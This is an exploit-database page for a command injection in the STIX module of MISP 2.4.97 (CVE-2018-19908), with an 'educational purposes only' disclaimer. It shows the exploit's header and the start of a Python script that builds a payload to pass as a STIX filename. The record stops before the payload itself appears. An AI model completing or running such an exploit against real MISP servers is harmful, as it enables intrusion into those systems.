MISP 2.4.97 SQL command execution via command injection in STIX module - Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-02-18 | Type: webapps | Platform: php
This exploit / vulnerability (MISP 2.4.97 SQL command execution via command injection in STIX module) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
    from base64 import b64encode
    from urllib.parse import quote_plus